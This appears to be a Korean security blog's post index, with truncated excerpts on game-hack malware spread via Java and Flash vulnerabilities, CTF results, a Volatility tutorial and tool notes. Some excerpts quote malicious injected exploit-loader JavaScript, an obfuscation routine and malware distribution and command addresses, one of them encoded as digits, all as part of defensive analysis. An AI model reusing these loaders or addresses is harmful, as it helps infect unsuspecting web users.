새롭게 추가된 온라인게임핵 악성코드 전파용 취약점 (CVE-2011-3544)

최근 국내에서 전파되는 온라인게임핵 악성코드와 관련하여 추가된 취약점이 있어 공유합니다. http://www.yo****ow.com/63/pps.html L http://www.yo****ow.com/63/jpg.js 이번주부터 추가되어 전파되는 것으로 보이며, CVE-2011-3544 (Oracle Java Applet Rhino Script Engine Remote Code Execution) 취약점으로 Oracle Java SE JDK and JRE 7 and 6 Update 27 이전 버전이면 감염이 됩니다. http://www.yo****ow.com/63/pps.html 코드를 살펴보면 이전과는 다른점을 확인할 수 있습니다. <script src=jpg.js></script> <script> …

새로운 URL 암호화 방법

최근 악성코드 중 아래와 같은 페이지에 접속하여 특정 명령을 받아 실행하는 악성코드를 확인하였습니다. hxxp://211.255.23.46/counter/update.txt 위 주소에 접속하면 아래와 같이 숫자만 나타나게 됩니다. 049058104116116112058047047049050049046050053052046049054053046049048053047105099111110115047107114046101120101 관련 악성코드를 분석해본 결과 예전에는 단순히 주소 혹은 XOR로 암호화 하였으나 이번엔 좀 새로운 패턴으로 한것을 확인하였습니다. 복호화는 아래 페이지에서 가능하도록 기능을 추가 하였습니다. http://119.194.217.188:8080/Honeypot/ ‘new’ 텍스트 박에서 해당 값을 입력하면 아래와 …

Hack The Packet

트위터에서 POC 이벤트 행사로 진행되는 Hack The Packet 예선전이 진행된다는 소식을 접했습니다. 회사에서 일찍 퇴근을 할까 하다가 이거나 좀 해보고 퇴근해야 겠다는 생각에 시작을 했습니다. http://www.hackthepacket.com 문제 유형은 pcap 파일을 하나 주어주고 여러 문항의 문제를 풀이하는 형태였는데 생각보다 문제가 잘풀려서 1위를 하게 되었네요. 1위 상품은 POC 티켓!!! 이번 대회로 인해 POC를 가게될거 같습니다 🙂 이번 …

2011 ISEC CTF 준우승

9월 20일 ~ 21일 양일에 거쳐 ISEC CTF 본선대회가 있었습니다. 저는 -cesi- 팀으로 참가를 했었는대요. 작년 본선에서 그리 좋지 못한 성적을 거둬서 이번에는 준비를 좀 하고 나갔었는데 아쉽게 준우승에 그쳤습니다. 대회 중간에 1등을 잠깐 하기도 했었는데 GoN팀이 다시 재역전을 하는 바람에 우승을 놓치게 되었네요. 다음번에는 꼭! 우승을 노려봐야 겠습니다.

난독화 코드 그리고 제작자의 실수?

최근 난독화 코드 중 새롭게 작성된 코드를 확인하여 공유 합니다. 우선 코드는 아래와 같습니다.[code]<script>var a1 = "ABCDEFG";var a2 = "HIJKLMNOP";var a3 = "QRSTUVWXYZabcdef";var keyStrs = a1+a2+a3+"ghijklmnopqrstuv"+"wxyz0123456789+/"+"=";function mydata(input){        var output="";        var chr1,chr2,chr3="";        var enc1,enc2,enc3,enc4="";        var i=0;        var base64test=/[^A-Za-z0-9+\/\=]/g;        …

Adobe Flash Player CVE-2011-2140 취약점 간단 분석

금일 분석하다 처음보는 취약점을 확인하여 기록합니다. 우선 특정 사이트에 아래와 같이 삽입이 되어 있었습니다. function user(){ var January="<script type=\"text/javascript\">window.onerror=function(){return true;};<\/script>\r\n"+ "<object width=\"550\" height=\"400\">\r\n"+ "<param name=\"movie\" value=\"done.swf\">\r\n"+ "<embed src=\"Birthday.swf\" width=\"550\" height=\"400\">\r\n"+ "<\/embed>\r\n"+ "<\/object>" ; var info = navigator.userAgent.toLowerCase(); var win = (navigator.platform == "Win32") || (navigator.platform == "Windows"); var ck=code(); var March = info.indexOf('msie 7.0'); var …

Volatility를 이용하여 Memory Dump에서 윈도우 패스워드 찾기

우선 Volatility를 다운로드 하도록 하자. 예전 버전은 Python을 이용하여 실행하였는데 최근에 2.0 으로 버전업 되면서 Python 없이 단독으로 실행이 가능해졌다.Volatility : https://www.volatilesystems.com/default/volatility 이제 실행해 보도록 하자. 우선 예제 메모리 덤프 파일은 아래주소에서 다운로드 하도록 하자.예제 메모리 덤프 파일 : http://www.cfreds.nist.gov/mem/memory-images.rar 우선 ‘-h’ 옵션으로 도움말을 보도록 하자.[code lang-bash]D:\Security Tools\Forensic\Memory Tools\volatility-2.0.standalone>volatility.exe -hVolatile Systems Volatility Framework 2.0Usage: Volatility …

2011년 ISEC 본선 진출!

2011년 8월 26일 오후 9시 부터 27일 오후 9시까지 24시간 예선 대회가 있었습니다. 저희는 -cesi- 이라는 팀이름으로 참가를 하였습니다. (이제 팀 이름도 바꿀때가 된듯…) 전체 순위 3위로 작년에 이어 올해도 본선 진출을 하게 되었네요. 올해는 본선에서 작년보다 좀 더 나은 성적을 기대해 봅니다.

Eclipse with PyDev

최근 Python 스크립트를 작성하는데 여러 함수와 클레스가 사용되는 스크립트라 Eclipse의 PyDev 플러그인을 이용하여 작성해 보았다. 나름 쓸만하였고 테마까지 셋팅해주니 앞으로 이것만 계속 쓸거 같은 느낌? 셋팅 과정에서 에러가 발생하는 부분이 있어 다음에 설치 시 삽질을 줄이고자 기록해 둔다. 1) 우선 이클립스를 다운로드 하자. Eclipse : http://www.eclipse.org 어떤 패키지도 상관없으나 난 PyDev만 사용할것이므로 용량이 제일 적은 …

Extracting EXE Drop Malware

평소 생각만 하고 언젠가 한번쯤 코딩해봐야지 했던 도구였는데 우연히 보게 되었다. 이 스크립트는 주로 타켓 공격에 많이 이용되는 PDF나 DOC 등 문서 파일의 취약점을 이용하여 악성코드를 감염시킬 때, 만약 문서파일 내부에 악성 PE파일이 있을 경우 뽑아주는 스크립트 이다. 물론 파일 내부에 삽입하지 않고 외부에서 다운로드 받아 실행하는 쉘코드가 들어가 있는 경우도 있지만 경험 상 PE파일이 …